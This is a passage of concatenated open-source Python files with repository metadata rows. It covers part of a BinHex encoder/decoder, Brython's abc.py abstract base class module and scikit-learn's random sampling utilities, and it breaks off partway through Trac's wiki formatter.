self.ofp.write(data)
def _writecrc(self):
# XXXX Should this be here??
# self.crc = binascii.crc_hqx('\0\0', self.crc)
if self.crc < 0:
fmt = '>h'
else:
fmt = '>H'
self.ofp.write(struct.pack(fmt, self.crc))
self.crc = 0
def write(self, data):
if self.state != _DID_HEADER:
raise Error('Writing data at the wrong time')
self.dlen = self.dlen - len(data)
self._write(data)
def close_data(self):
if self.dlen != 0:
raise Error('Incorrect data size, diff=%r' % (self.rlen,))
self._writecrc()
self.state = _DID_DATA
def write_rsrc(self, data):
if self.state < _DID_DATA:
self.close_data()
if self.state != _DID_DATA:
raise Error('Writing resource data at the wrong time')
self.rlen = self.rlen - len(data)
self._write(data)
def close(self):
if self.state < _DID_DATA:
self.close_data()
if self.state != _DID_DATA:
raise Error('Close at the wrong time')
if self.rlen != 0:
raise Error("Incorrect resource-datasize, diff=%r" % (self.rlen,))
self._writecrc()
self.ofp.close()
self.state = None
del self.ofp
def binhex(inp, out):
"""binhex(infilename, outfilename): create binhex-encoded copy of a file"""
finfo = getfileinfo(inp)
ofp = BinHex(finfo, out)
ifp = io.open(inp, 'rb')
# XXXX Do textfile translation on non-mac systems
while True:
d = ifp.read(128000)
if not d: break
ofp.write(d)
ofp.close_data()
ifp.close()
ifp = openrsrc(inp, 'rb')
while True:
d = ifp.read(128000)
if not d: break
ofp.write_rsrc(d)
ofp.close()
ifp.close()
class _Hqxdecoderengine:
"""Read data via the decoder in 4-byte chunks"""
def __init__(self, ifp):
self.ifp = ifp
self.eof = 0
def read(self, totalwtd):
"""Read at least wtd bytes (or until EOF)"""
decdata = b''
wtd = totalwtd
#
# The loop here is convoluted, since we don't really now how
# much to decode: there may be newlines in the incoming data.
while wtd > 0:
if self.eof: return decdata
wtd = ((wtd + 2) // 3) * 4
data = self.ifp.read(wtd)
#
# Next problem: there may not be a complete number of
# bytes in what we pass to a2b. Solve by yet another
# loop.
#
while True:
try:
decdatacur, self.eof = binascii.a2b_hqx(data)
break
except binascii.Incomplete:
pass
newdata = self.ifp.read(1)
if not newdata:
raise Error('Premature EOF on binhex file')
data = data + newdata
decdata = decdata + decdatacur
wtd = totalwtd - len(decdata)
if not decdata and not self.eof:
raise Error('Premature EOF on binhex file')
return decdata
def close(self):
self.ifp.close()
class _Rledecoderengine:
"""Read data via the RLE-coder"""
def __init__(self, ifp):
self.ifp = ifp
self.pre_buffer = b''
self.post_buffer = b''
self.eof = 0
def read(self, wtd):
if wtd > len(self.post_buffer):
self._fill(wtd - len(self.post_buffer))
rv = self.post_buffer[:wtd]
self.post_buffer = self.post_buffer[wtd:]
return rv
def _fill(self, wtd):
self.pre_buffer = self.pre_buffer + self.ifp.read(wtd + 4)
if self.ifp.eof:
self.post_buffer = self.post_buffer + \
binascii.rledecode_hqx(self.pre_buffer)
self.pre_buffer = b''
return
#
# Obfuscated code ahead. We have to take care that we don't
# end up with an orphaned RUNCHAR later on. So, we keep a couple
# of bytes in the buffer, depending on what the end of
# the buffer looks like:
# '\220\0\220' - Keep 3 bytes: repeated \220 (escaped as \220\0)
# '?\220' - Keep 2 bytes: repeated something-else
# '\220\0' - Escaped \220: Keep 2 bytes.
# '?\220?' - Complete repeat sequence: decode all
# otherwise: keep 1 byte.
#
mark = len(self.pre_buffer)
if self.pre_buffer[-3:] == RUNCHAR + b'\0' + RUNCHAR:
mark = mark - 3
elif self.pre_buffer[-1:] == RUNCHAR:
mark = mark - 2
elif self.pre_buffer[-2:] == RUNCHAR + b'\0':
mark = mark - 2
elif self.pre_buffer[-2:-1] == RUNCHAR:
pass # Decode all
else:
mark = mark - 1
self.post_buffer = self.post_buffer + \
binascii.rledecode_hqx(self.pre_buffer[:mark])
self.pre_buffer = self.pre_buffer[mark:]
def close(self):
self.ifp.close()
class HexBin:
def __init__(self, ifp):
if isinstance(ifp, str):
ifp = io.open(ifp, 'rb')
#
# Find initial colon.
#
while True:
ch = ifp.read(1)
if not ch:
raise Error("No binhex data found")
# Cater for \r\n terminated lines (which show up as \n\r, hence
# all lines start with \r)
if ch == b'\r':
continue
if ch == b':':
break
hqxifp = _Hqxdecoderengine(ifp)
self.ifp = _Rledecoderengine(hqxifp)
self.crc = 0
self._readheader()
def _read(self, len):
data = self.ifp.read(len)
self.crc = binascii.crc_hqx(data, self.crc)
return data
def _checkcrc(self):
filecrc = struct.unpack('>h', self.ifp.read(2))[0] & 0xffff
#self.crc = binascii.crc_hqx('\0\0', self.crc)
# XXXX Is this needed??
self.crc = self.crc & 0xffff
if filecrc != self.crc:
raise Error('CRC error, computed %x, read %x'
% (self.crc, filecrc))
self.crc = 0
def _readheader(self):
len = self._read(1)
fname = self._read(ord(len))
rest = self._read(1 + 4 + 4 + 2 + 4 + 4)
self._checkcrc()
type = rest[1:5]
creator = rest[5:9]
flags = struct.unpack('>h', rest[9:11])[0]
self.dlen = struct.unpack('>l', rest[11:15])[0]
self.rlen = struct.unpack('>l', rest[15:19])[0]
self.FName = fname
self.FInfo = FInfo()
self.FInfo.Creator = creator
self.FInfo.Type = type
self.FInfo.Flags = flags
self.state = _DID_HEADER
def read(self, *n):
if self.state != _DID_HEADER:
raise Error('Read data at wrong time')
if n:
n = n[0]
n = min(n, self.dlen)
else:
n = self.dlen
rv = b''
while len(rv) < n:
rv = rv + self._read(n-len(rv))
self.dlen = self.dlen - n
return rv
def close_data(self):
if self.state != _DID_HEADER:
raise Error('close_data at wrong time')
if self.dlen:
dummy = self._read(self.dlen)
self._checkcrc()
self.state = _DID_DATA
def read_rsrc(self, *n):
if self.state == _DID_HEADER:
self.close_data()
if self.state != _DID_DATA:
raise Error('Read resource data at wrong time')
if n:
n = n[0]
n = min(n, self.rlen)
else:
n = self.rlen
self.rlen = self.rlen - n
return self._read(n)
def close(self):
if self.rlen:
dummy = self.read_rsrc(self.rlen)
self._checkcrc()
self.state = _DID_RSRC
self.ifp.close()
def hexbin(inp, out):
"""hexbin(infilename, outfilename) - Decode binhexed file"""
ifp = HexBin(inp)
finfo = ifp.FInfo
if not out:
out = ifp.FName
ofp = io.open(out, 'wb')
# XXXX Do translation on non-mac systems
while True:
d = ifp.read(128000)
if not d: break
ofp.write(d)
ofp.close()
ifp.close_data()
d = ifp.read_rsrc(128000)
if d:
ofp = openrsrc(out, 'wb')
ofp.write(d)
while True:
d = ifp.read_rsrc(128000)
if not d: break
ofp.write(d)
ofp.close()
ifp.close()
| lgpl-3.0 |
40223119/w16b_test | static/Brython3.1.0-20150301-090019/Lib/abc.py | 765 | 8057 | # Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Abstract Base Classes (ABCs) according to PEP 3119."""
from _weakrefset import WeakSet
def abstractmethod(funcobj):
"""A decorator indicating abstract methods.
Requires that the metaclass is ABCMeta or derived from it. A
class that has a metaclass derived from ABCMeta cannot be
instantiated unless all of its abstract methods are overridden.
The abstract methods can be called using any of the normal
'super' call mechanisms.
Usage:
class C(metaclass=ABCMeta):
@abstractmethod
def my_abstract_method(self, ...):
...
"""
funcobj.__isabstractmethod__ = True
return funcobj
class abstractclassmethod(classmethod):
"""
A decorator indicating abstract classmethods.
Similar to abstractmethod.
Usage:
class C(metaclass=ABCMeta):
@abstractclassmethod
def my_abstract_classmethod(cls, ...):
...
'abstractclassmethod' is deprecated. Use 'classmethod' with
'abstractmethod' instead.
"""
__isabstractmethod__ = True
def __init__(self, callable):
callable.__isabstractmethod__ = True
super().__init__(callable)
class abstractstaticmethod(staticmethod):
"""
A decorator indicating abstract staticmethods.
Similar to abstractmethod.
Usage:
class C(metaclass=ABCMeta):
@abstractstaticmethod
def my_abstract_staticmethod(...):
...
'abstractstaticmethod' is deprecated. Use 'staticmethod' with
'abstractmethod' instead.
"""
__isabstractmethod__ = True
def __init__(self, callable):
callable.__isabstractmethod__ = True
super().__init__(callable)
class abstractproperty(property):
"""
A decorator indicating abstract properties.
Requires that the metaclass is ABCMeta or derived from it. A
class that has a metaclass derived from ABCMeta cannot be
instantiated unless all of its abstract properties are overridden.
The abstract properties can be called using any of the normal
'super' call mechanisms.
Usage:
class C(metaclass=ABCMeta):
@abstractproperty
def my_abstract_property(self):
...
This defines a read-only property; you can also define a read-write
abstract property using the 'long' form of property declaration:
class C(metaclass=ABCMeta):
def getx(self): ...
def setx(self, value): ...
x = abstractproperty(getx, setx)
'abstractproperty' is deprecated. Use 'property' with 'abstractmethod'
instead.
"""
__isabstractmethod__ = True
class ABCMeta(type):
"""Metaclass for defining Abstract Base Classes (ABCs).
Use this metaclass to create an ABC. An ABC can be subclassed
directly, and then acts as a mix-in class. You can also register
unrelated concrete classes (even built-in classes) and unrelated
ABCs as 'virtual subclasses' -- these and their descendants will
be considered subclasses of the registering ABC by the built-in
issubclass() function, but the registering ABC won't show up in
their MRO (Method Resolution Order) nor will method
implementations defined by the registering ABC be callable (not
even via super()).
"""
# A global counter that is incremented each time a class is
# registered as a virtual subclass of anything. It forces the
# negative cache to be cleared before its next use.
_abc_invalidation_counter = 0
def __new__(mcls, name, bases, namespace):
cls = super().__new__(mcls, name, bases, namespace)
# Compute set of abstract method names
abstracts = {name
for name, value in namespace.items()
if getattr(value, "__isabstractmethod__", False)}
for base in bases:
for name in getattr(base, "__abstractmethods__", set()):
value = getattr(cls, name, None)
if getattr(value, "__isabstractmethod__", False):
abstracts.add(name)
cls.__abstractmethods__ = frozenset(abstracts)
# Set up inheritance registry
cls._abc_registry = WeakSet()
cls._abc_cache = WeakSet()
cls._abc_negative_cache = WeakSet()
cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter
return cls
def register(cls, subclass):
"""Register a virtual subclass of an ABC.
Returns the subclass, to allow usage as a class decorator.
"""
if not isinstance(subclass, type):
raise TypeError("Can only register classes")
if issubclass(subclass, cls):
return subclass # Already a subclass
# Subtle: test for cycles *after* testing for "already a subclass";
# this means we allow X.register(X) and interpret it as a no-op.
if issubclass(cls, subclass):
# This would create a cycle, which is bad for the algorithm below
raise RuntimeError("Refusing to create an inheritance cycle")
cls._abc_registry.add(subclass)
ABCMeta._abc_invalidation_counter += 1 # Invalidate negative cache
return subclass
def _dump_registry(cls, file=None):
"""Debug helper to print the ABC registry."""
print("Class: %s.%s" % (cls.__module__, cls.__name__), file=file)
print("Inv.counter: %s" % ABCMeta._abc_invalidation_counter, file=file)
for name in sorted(cls.__dict__.keys()):
if name.startswith("_abc_"):
value = getattr(cls, name)
print("%s: %r" % (name, value), file=file)
def __instancecheck__(cls, instance):
"""Override for isinstance(instance, cls)."""
# Inline the cache checking
subclass = instance.__class__
if subclass in cls._abc_cache:
return True
subtype = type(instance)
if subtype is subclass:
if (cls._abc_negative_cache_version ==
ABCMeta._abc_invalidation_counter and
subclass in cls._abc_negative_cache):
return False
# Fall back to the subclass check.
return cls.__subclasscheck__(subclass)
return any(cls.__subclasscheck__(c) for c in {subclass, subtype})
def __subclasscheck__(cls, subclass):
"""Override for issubclass(subclass, cls)."""
# Check cache
if subclass in cls._abc_cache:
return True
# Check negative cache; may have to invalidate
if cls._abc_negative_cache_version < ABCMeta._abc_invalidation_counter:
# Invalidate the negative cache
cls._abc_negative_cache = WeakSet()
cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter
elif subclass in cls._abc_negative_cache:
return False
# Check the subclass hook
ok = cls.__subclasshook__(subclass)
if ok is not NotImplemented:
assert isinstance(ok, bool)
if ok:
cls._abc_cache.add(subclass)
else:
cls._abc_negative_cache.add(subclass)
return ok
# Check if it's a direct subclass
if cls in getattr(subclass, '__mro__', ()):
cls._abc_cache.add(subclass)
return True
# Check if it's a subclass of a registered class (recursive)
for rcls in cls._abc_registry:
if issubclass(subclass, rcls):
cls._abc_cache.add(subclass)
return True
# Check if it's a subclass of a subclass (recursive)
for scls in cls.__subclasses__():
if issubclass(subclass, scls):
cls._abc_cache.add(subclass)
return True
# No dice; update negative cache
cls._abc_negative_cache.add(subclass)
return False
| gpl-3.0 |
shyamalschandra/scikit-learn | sklearn/utils/random.py | 234 | 10510 | # Author: Hamzeh Alsalhi <ha258@cornell.edu>
#
# License: BSD 3 clause
from __future__ import division
import numpy as np
import scipy.sparse as sp
import operator
import array
from sklearn.utils import check_random_state
from sklearn.utils.fixes import astype
from ._random import sample_without_replacement
__all__ = ['sample_without_replacement', 'choice']
# This is a backport of np.random.choice from numpy 1.7
# The function can be removed when we bump the requirements to >=1.7
def choice(a, size=None, replace=True, p=None, random_state=None):
"""
choice(a, size=None, replace=True, p=None)
Generates a random sample from a given 1-D array
.. versionadded:: 1.7.0
Parameters
-----------
a : 1-D array-like or int
If an ndarray, a random sample is generated from its elements.
If an int, the random sample is generated as if a was np.arange(n)
size : int or tuple of ints, optional
Output shape. Default is None, in which case a single value is
returned.
replace : boolean, optional
Whether the sample is with or without replacement.
p : 1-D array-like, optional
The probabilities associated with each entry in a.
If not given the sample assumes a uniform distribtion over all
entries in a.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
--------
samples : 1-D ndarray, shape (size,)
The generated random samples
Raises
-------
ValueError
If a is an int and less than zero, if a or p are not 1-dimensional,
if a is an array-like of size 0, if p is not a vector of
probabilities, if a and p have different lengths, or if
replace=False and the sample size is greater than the population
size
See Also
---------
randint, shuffle, permutation
Examples
---------
Generate a uniform random sample from np.arange(5) of size 3:
>>> np.random.choice(5, 3) # doctest: +SKIP
array([0, 3, 4])
>>> #This is equivalent to np.random.randint(0,5,3)
Generate a non-uniform random sample from np.arange(5) of size 3:
>>> np.random.choice(5, 3, p=[0.1, 0, 0.3, 0.6, 0]) # doctest: +SKIP
array([3, 3, 0])
Generate a uniform random sample from np.arange(5) of size 3 without
replacement:
>>> np.random.choice(5, 3, replace=False) # doctest: +SKIP
array([3,1,0])
>>> #This is equivalent to np.random.shuffle(np.arange(5))[:3]
Generate a non-uniform random sample from np.arange(5) of size
3 without replacement:
>>> np.random.choice(5, 3, replace=False, p=[0.1, 0, 0.3, 0.6, 0])
... # doctest: +SKIP
array([2, 3, 0])
Any of the above can be repeated with an arbitrary array-like
instead of just integers. For instance:
>>> aa_milne_arr = ['pooh', 'rabbit', 'piglet', 'Christopher']
>>> np.random.choice(aa_milne_arr, 5, p=[0.5, 0.1, 0.1, 0.3])
... # doctest: +SKIP
array(['pooh', 'pooh', 'pooh', 'Christopher', 'piglet'],
dtype='|S11')
"""
random_state = check_random_state(random_state)
# Format and Verify input
a = np.array(a, copy=False)
if a.ndim == 0:
try:
# __index__ must return an integer by python rules.
pop_size = operator.index(a.item())
except TypeError:
raise ValueError("a must be 1-dimensional or an integer")
if pop_size <= 0:
raise ValueError("a must be greater than 0")
elif a.ndim != 1:
raise ValueError("a must be 1-dimensional")
else:
pop_size = a.shape[0]
if pop_size is 0:
raise ValueError("a must be non-empty")
if None != p:
p = np.array(p, dtype=np.double, ndmin=1, copy=False)
if p.ndim != 1:
raise ValueError("p must be 1-dimensional")
if p.size != pop_size:
raise ValueError("a and p must have same size")
if np.any(p < 0):
raise ValueError("probabilities are not non-negative")
if not np.allclose(p.sum(), 1):
raise ValueError("probabilities do not sum to 1")
shape = size
if shape is not None:
size = np.prod(shape, dtype=np.intp)
else:
size = 1
# Actual sampling
if replace:
if None != p:
cdf = p.cumsum()
cdf /= cdf[-1]
uniform_samples = random_state.random_sample(shape)
idx = cdf.searchsorted(uniform_samples, side='right')
# searchsorted returns a scalar
idx = np.array(idx, copy=False)
else:
idx = random_state.randint(0, pop_size, size=shape)
else:
if size > pop_size:
raise ValueError("Cannot take a larger sample than "
"population when 'replace=False'")
if None != p:
if np.sum(p > 0) < size:
raise ValueError("Fewer non-zero entries in p than size")
n_uniq = 0
p = p.copy()
found = np.zeros(shape, dtype=np.int)
flat_found = found.ravel()
while n_uniq < size:
x = random_state.rand(size - n_uniq)
if n_uniq > 0:
p[flat_found[0:n_uniq]] = 0
cdf = np.cumsum(p)
cdf /= cdf[-1]
new = cdf.searchsorted(x, side='right')
_, unique_indices = np.unique(new, return_index=True)
unique_indices.sort()
new = new.take(unique_indices)
flat_found[n_uniq:n_uniq + new.size] = new
n_uniq += new.size
idx = found
else:
idx = random_state.permutation(pop_size)[:size]
if shape is not None:
idx.shape = shape
if shape is None and isinstance(idx, np.ndarray):
# In most cases a scalar will have been made an array
idx = idx.item(0)
# Use samples as indices for a if a is array-like
if a.ndim == 0:
return idx
if shape is not None and idx.ndim == 0:
# If size == () then the user requested a 0-d array as opposed to
# a scalar object when size is None. However a[idx] is always a
# scalar and not an array. So this makes sure the result is an
# array, taking into account that np.array(item) may not work
# for object arrays.
res = np.empty((), dtype=a.dtype)
res[()] = a[idx]
return res
return a[idx]
def random_choice_csc(n_samples, classes, class_probability=None,
random_state=None):
"""Generate a sparse random matrix given column class distributions
Parameters
----------
n_samples : int,
Number of samples to draw in each column.
classes : list of size n_outputs of arrays of size (n_classes,)
List of classes for each column.
class_probability : list of size n_outputs of arrays of size (n_classes,)
Optional (default=None). Class distribution of each column. If None the
uniform distribution is assumed.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
-------
random_matrix : sparse csc matrix of size (n_samples, n_outputs)
"""
data = array.array('i')
indices = array.array('i')
indptr = array.array('i', [0])
for j in range(len(classes)):
classes[j] = np.asarray(classes[j])
if classes[j].dtype.kind != 'i':
raise ValueError("class dtype %s is not supported" %
classes[j].dtype)
classes[j] = astype(classes[j], np.int64, copy=False)
# use uniform distribution if no class_probability is given
if class_probability is None:
class_prob_j = np.empty(shape=classes[j].shape[0])
class_prob_j.fill(1 / classes[j].shape[0])
else:
class_prob_j = np.asarray(class_probability[j])
if np.sum(class_prob_j) != 1.0:
raise ValueError("Probability array at index {0} does not sum to "
"one".format(j))
if class_prob_j.shape[0] != classes[j].shape[0]:
raise ValueError("classes[{0}] (length {1}) and "
"class_probability[{0}] (length {2}) have "
"different length.".format(j,
classes[j].shape[0],
class_prob_j.shape[0]))
# If 0 is not present in the classes insert it with a probability 0.0
if 0 not in classes[j]:
classes[j] = np.insert(classes[j], 0, 0)
class_prob_j = np.insert(class_prob_j, 0, 0.0)
# If there are nonzero classes choose randomly using class_probability
rng = check_random_state(random_state)
if classes[j].shape[0] > 1:
p_nonzero = 1 - class_prob_j[classes[j] == 0]
nnz = int(n_samples * p_nonzero)
ind_sample = sample_without_replacement(n_population=n_samples,
n_samples=nnz,
random_state=random_state)
indices.extend(ind_sample)
# Normalize probabilites for the nonzero elements
classes_j_nonzero = classes[j] != 0
class_probability_nz = class_prob_j[classes_j_nonzero]
class_probability_nz_norm = (class_probability_nz /
np.sum(class_probability_nz))
classes_ind = np.searchsorted(class_probability_nz_norm.cumsum(),
rng.rand(nnz))
data.extend(classes[j][classes_j_nonzero][classes_ind])
indptr.append(len(indices))
return sp.csc_matrix((data, indices, indptr),
(n_samples, len(classes)),
dtype=int)
| bsd-3-clause |
rbaumg/trac | trac/wiki/formatter.py | 1 | 63756 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2003-2019 Edgewall Software
# Copyright (C) 2003-2005 Jonas Borgström <jonas@edgewall.com>
# Copyright (C) 2004-2005 Christopher Lenz <cmlenz@gmx.de>
# Copyright (C) 2005-2007 Christian Boos <cboos@edgewall.org>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
#
# Author: Jonas Borgström <jonas@edgewall.com>
# Christopher Lenz <cmlenz@gmx.de>
# Christian Boos <cboos@edgewall.org>
from HTMLParser import HTMLParseError
import io
import re
from trac.core import *
from trac.mimeview import *
from trac.resource import get_relative_resource, get_resource_url
from trac.util import arity, as_int
from trac.util.text import (
exception_to_unicode, shorten_line, to_unicode, unicode_quote,
unquote_label
)
from trac.util.html import (
Element, Fragment, Markup, Stream, TracHTMLSanitizer, escape, genshi,
plaintext, stream_to_unicode, tag, to_fragment
)
from trac.util.translation import _, tag_
from trac.wiki.api import WikiSystem, parse_args
from trac.wiki.parser import WikiParser, parse_processor_args
__all__ = ['Formatter', 'MacroError', 'ProcessorError',
'concat_path_query_fragment', 'extract_link', 'format_to',
'format_to_html', 'format_to_oneliner',
'split_url_into_path_query_fragment', 'wiki_to_outline']
def _markup_to_unicode(markup):
if isinstance(markup, Fragment):
return Markup(markup)
elif genshi and isinstance(markup, Stream):
return stream_to_unicode(markup)
else:
return to_unicode(markup)
def system_message(msg, text=None):
return tag.div(tag.strong(msg), text and tag.pre(text),
class_="system-message")
def split_url_into_path_query_fragment(target):
"""Split a target along `?` and `#` in `(path, query, fragment)`.
>>> split_url_into_path_query_fragment('http://path?a=1&b=2#frag?ment')
('http://path', '?a=1&b=2', '#frag?ment')
>>> split_url_into_path_query_fragment('http://path#frag?ment')
('http://path', '', '#frag?ment')
>>> split_url_into_path_query_fragment('http://path?a=1&b=2')
('http://path', '?a=1&b=2', '')
>>> split_url_into_path_query_fragment('http://path')
('http://path', '', '')
"""
query = fragment = ''
idx = target.find('#')
if idx >= 0:
target, fragment = target[:idx], target[idx:]
idx = target.find('?')
if idx >= 0:
target, query = target[:idx], target[idx:]
return target, query, fragment
def concat_path_query_fragment(path, query, fragment=None):
"""Assemble `path`, `query` and `fragment` into a proper URL.
Can be used to re-assemble an URL decomposed using
`split_url_into_path_query_fragment` after modification.
>>> concat_path_query_fragment('/wiki/page', '?version=1')
'/wiki/page?version=1'
>>> concat_path_query_fragment('/wiki/page#a', '?version=1', '#b')
'/wiki/page?version=1#b'
>>> concat_path_query_fragment('/wiki/page?version=1#a', '?format=txt')
'/wiki/page?version=1&format=txt#a'
>>> concat_path_query_fragment('/wiki/page?version=1', '&format=txt')
'/wiki/page?version=1&format=txt'
>>> concat_path_query_fragment('/wiki/page?version=1', 'format=txt')
'/wiki/page?version=1&format=txt'
>>> concat_path_query_fragment('/wiki/page?version=1#a', '?format=txt', '#')
'/wiki/page?version=1&format=txt'
"""
p, q, f = split_url_into_path_query_fragment(path)
if query:
q += ('&' if q else '?') + query.lstrip('?&')
if fragment:
f = fragment
return p + q + ('' if f == '#' else f)
class MacroError(TracError):
"""Exception raised on incorrect macro usage.
The exception is trapped by the wiki formatter and the message is
rendered in a `pre` tag, wrapped in a div with class `system-message`.
:since: 1.0.11
"""
pass
class ProcessorError(TracError):
"""Exception raised on incorrect processor usage.
The exception is trapped by the wiki formatter and the message is
rendered in a `pre` tag, wrapped in a div with class `system-message`.
:since: 0.12
"""
pass
class WikiProcessor(object):
_code_block_re = re.compile('^<div(?:\s+class="([^"]+)")?>(.*)</div>$')
_block_elem_re = re.compile(r'^\s*<(?:div|table)(?:\s+[^>]+)?>',
re.I | re.M)
def __init__(self, formatter, name, args=None):
"""Find the processor by name
:param formatter: the formatter embedding a call for this processor
:param name: the name of the processor
:param args: extra parameters for the processor
(''since 0.11'')
"""
self.formatter = formatter
self.env = formatter.env
self.name = name
self.args = args
self.error = None
self.macro_provider = None
# FIXME: move these tables outside of __init__
builtin_processors = {'html': self._html_processor,
'htmlcomment': self._htmlcomment_processor,
'default': self._default_processor,
'comment': self._comment_processor,
'div': self._div_processor,
'rtl': self._rtl_processor,
'span': self._span_processor,
'Span': self._span_processor,
'td': self._td_processor,
'th': self._th_processor,
'tr': self._tr_processor,
'table': self._table_processor,
}
self.inline_check = {'html': self._html_is_inline,
'htmlcomment': True, 'comment': True,
'span': True, 'Span': True,
}.get(name)
self._sanitizer = TracHTMLSanitizer(
safe_schemes=formatter.wiki.safe_schemes,
safe_origins=formatter.wiki.safe_origins)
self.processor = builtin_processors.get(name)
if not self.processor:
# Find a matching wiki macro
for macro_provider in WikiSystem(self.env).macro_providers:
for macro_name in macro_provider.get_macros() or []:
if self.name == macro_name:
if hasattr(macro_provider, 'expand_macro'):
self.processor = self._macro_processor
else:
raise TracError(
tag_("Pre-0.11 macros with the %(method)s "
"method are no longer supported.",
method=tag.code("render_macro")))
self.macro_provider = macro_provider
self.inline_check = getattr(macro_provider, 'is_inline',
False)
break
if not self.processor:
# Find a matching mimeview renderer
mimeview = Mimeview(formatter.env)
for renderer in mimeview.renderers:
if renderer.get_quality_ratio(self.name) > 1:
self.processor = self._mimeview_processor
break
if not self.processor:
mimetype = mimeview.get_mimetype(self.name)
if mimetype:
self.name = mimetype
self.processor = self._mimeview_processor
if not self.processor:
self.processor = self._default_processor
self.error = _("No macro or processor named '%(name)s' found",
name=name)
# inline checks
def _html_is_inline(self, text):
if text:
tag = text[1:].lstrip()
idx = tag.find(' ')
if idx > -1:
tag = tag[:idx]
return tag.lower() in ('a', 'span', 'bdo', 'img',
'big', 'small', 'font',
'tt', 'i', 'b', 'u', 's', 'strike',
'em', 'strong', 'dfn', 'code', 'q',
'samp', 'kbd', 'var', 'cite', 'abbr',
'acronym', 'sub', 'sup')
# builtin processors
def _comment_processor(self, text):
return ''
def _default_processor(self, text):
if self.args and 'lineno' in self.args:
self.name = \
Mimeview(self.formatter.env).get_mimetype('text/plain')
return self._mimeview_processor(text)
else:
return tag.pre(text, class_="wiki")
def _html_processor(self, text):
if WikiSystem(self.env).render_unsafe_content:
return Markup(text)
try:
return self._sanitizer.sanitize(text)
except HTMLParseError as e:
self.env.log.warning(e)
line = unicode(text).splitlines()[e.lineno - 1].strip()
return system_message(_('HTML parsing error: %(message)s',
message=escape(e.msg)), line)
def _htmlcomment_processor(self, text):
if "--" in text:
return system_message(_('Error: Forbidden character sequence '
'"--" in htmlcomment wiki code block'))
return Markup(u'<!--\n%s-->\n' % text)
def _elt_processor(self, eltname, format_to, text):
# Note: as long as _processor_param_re is not re.UNICODE, **args is OK.
# Also, parse_args is using strict mode when processing [[span(...)]].
elt = getattr(tag, eltname)(**(self.args or {}))
if not WikiSystem(self.env).render_unsafe_content:
sanitized_elt = getattr(tag, eltname)
sanitized_elt.attrib = self._sanitizer.sanitize_attrs(eltname,
elt.attrib)
elt = sanitized_elt
elt.append(format_to(self.env, self.formatter.context, text))
return elt
def _div_processor(self, text):
if not self.args:
self.args = {}
self.args.setdefault('class', 'wikipage')
return self._elt_processor('div', format_to_html, text)
def _rtl_processor(self, text):
if not self.args:
self.args = {}
self.args['class'] = ('rtl ' + self.args.get('class', '')).rstrip()
return self._elt_processor('div', format_to_html, text)
def _span_processor(self, text):
if self.args is None:
args, self.args = parse_args(text, strict=True)
text = ', '.join(args)
return self._elt_processor('span', format_to_oneliner, text)
def _td_processor(self, text):
return self._tablecell_processor('td', text)
def _th_processor(self, text):
return self._tablecell_processor('th', text)
def _tr_processor(self, text):
try:
elt = self._elt_processor('tr', self._format_row, text)
self.formatter.open_table()
return elt
except ProcessorError as e:
return system_message(e)
def _table_processor(self, text):
if not self.args:
self.args = {}
self.args.setdefault('class', 'wiki')
try:
return self._elt_processor('table', self._format_table, text)
except ProcessorError as e:
return system_message(e)
def _tablecell_processor(self, eltname, text):
self.formatter.open_table_row()
return self._elt_processor(eltname, format_to_html, text)
_has_multiple_tables_re = re.compile(r"</table>.*?<table",
re.MULTILINE | re.DOTALL)
_inner_table_re = re.compile(r"""\s*
<table[^>]*>\s*
((?:<tr[^>]*>)?
(.*?)
(?:</tr>)?)\s*
</table>\s*$
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
# Note: the need for "parsing" that crude way the formatted content
# will go away as soon as we have a WikiDOM to manipulate...
def _parse_inner_table(self, text):
if self._has_multiple_tables_re.search(text):
raise ProcessorError(_("!#%(name)s must contain at most one table",
name=self.name))
match = self._inner_table_re.match(text)
if not match:
raise ProcessorError(_("!#%(name)s must contain at least one table"
" cell (and table cells only)",
name=self.name))
return Markup(match.group(1 if self.name == 'table' else 2))
def _format_row(self, env, context, text):
if text:
out = io.StringIO()
Formatter(env, context).format(text, out)
text = self._parse_inner_table(out.getvalue())
return text
def _format_table(self, env, context, text):
if text:
out = io.StringIO()
Formatter(env, context).format(text, out)
text = self._parse_inner_table(out.getvalue())
return text
# generic processors
def _macro_processor(self, text):
self.env.log.debug('Executing Wiki macro %s by provider %s',
self.name, self.macro_provider)
if arity(self.macro_provider.expand_macro) == 4:
return self.macro_provider.expand_macro(self.formatter, self.name,
text, self.args)
else:
return self.macro_provider.expand_macro(self.formatter, self.name,
text)
def _mimeview_processor(self, text):
annotations = []
context = self.formatter.context.child()
args = self.args.copy() if self.args else self.args
if args and 'lineno' in args:
lineno = as_int(args.pop('lineno'), 1, min=1)
context.set_hints(lineno=lineno)
id = str(args.pop('id', '')) or \
self.formatter._unique_anchor('a')
context.set_hints(id=id + '-')
if 'marks' in args:
context.set_hints(marks=args.pop('marks'))
annotations.append('lineno')
if args: # Remaining args are assumed to be lexer options
context.set_hints(lexer_options=args)
return tag.div(class_='wiki-code')(
Mimeview(self.env).render(context, self.name, text,
annotations=annotations))
# TODO: use convert('text/html') instead of render
def process(self, text, in_paragraph=False):
if self.error:
text = system_message(tag_("Error: Failed to load processor "
"%(name)s", name=tag.code(self.name)),
self.error)
else:
text = self.processor(text)
return text or ''
def is_inline(self, text):
if callable(self.inline_check):
return self.inline_check(text)
else:
return self.inline_check
def ensure_inline(self, text, in_paragraph=True):
content_for_span = None
interrupt_paragraph = False
if isinstance(text, Element):
tagname = text.tag.lower()
if tagname == 'div':
class_ = text.attrib.get('class', '')
if class_ and 'code' in class_:
content_for_span = text.children
else:
interrupt_paragraph = True
elif tagname == 'table':
interrupt_paragraph = True
else:
# FIXME: do something smarter for Streams
text = _markup_to_unicode(text)
match = re.match(self._code_block_re, text)
if match:
